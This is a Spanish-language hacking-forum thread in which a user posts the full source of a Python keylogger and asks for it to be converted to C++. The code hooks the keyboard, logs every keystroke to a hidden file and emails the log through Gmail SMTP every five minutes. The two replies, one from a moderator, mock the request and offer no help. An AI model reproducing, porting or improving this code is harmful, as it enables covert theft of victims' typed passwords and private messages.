elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse, K-YreX)
| | |-+  De Python a C++
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: De Python a C++  (Leído 1,448 veces)
elhacker.net01

Desconectado Desconectado

Mensajes: 1


Ver Perfil
De Python a C++
« en: 28 Abril 2018, 19:42 pm »

Buenos dias, necesito que me ayuden a convertir ese codigo de python a C++

aqui les dejo el codigo


Código:
import pyHook, pythoncom, sys, logging
import time, datetime
#crear la ruta en el disco C:
wait_seconds = 300
timeout = time.time() + wait_seconds
file_log = 'C:\\secret\\dat.txt'

def TimeOut():
  if time.time() > timeout:
    return True
  else:
    return False

def SendEmail(user, pwd, recipient, subject, body):
  import smtplib
 
  gmail_user= user
  gmail_pass = pwd
  FROM = user
  TO = recipient if type(recipient) is list else [recipient]
  SUBJECT = subject
  TEXT = body
 
  message = """\From: %s\nTo: %s\nSubject: %s\n\n%s
  """ % (FROM, ", ".join(TO), SUBJECT, TEXT)
  try:
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.ehlo()
    server.starttls()
    server.login(gmail_user, gmail_pass)
    server.sendmail(FROM, TO, message)
    server.close()
    print 'Correo enviado satisfactoriamente!'
  except:
    print 'Error al mandar correo!'

def FormatAndSendLogEmail():
  with open(file_log, 'r+') as f:
    actualdate = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    data = f.read().replace('\n', '')
    data = 'Log capturado a las: '+ actualdate + '\n' + data
    SendEmail('correo', 'clave', 'correo',
              'Nuevo log - '+actualdate, data)
    f.seek(0)
    f.truncate()
   
def OnKeyboardEvent(event):
  logging.basicConfig(filename=file_log, level=logging.DEBUG,
                      format = '%(message)s')
  logging.log(10, chr(event.Ascii))
  return True
 
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()

while True:
  if TimeOut():
    FormatAndSendLogEmail()
    timeout = time.time() + wait_seconds
 



En línea

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: De Python a C++
« Respuesta #1 en: 28 Abril 2018, 19:44 pm »

necesitas un montoooon de trabajo XD


que llevas hecho?


En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
srWhiteSkull


Desconectado Desconectado

Mensajes: 444



Ver Perfil WWW
Re: De Python a C++
« Respuesta #2 en: 28 Abril 2018, 19:56 pm »

Y yo necesito dinero y una china que me haga masajes Xd
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines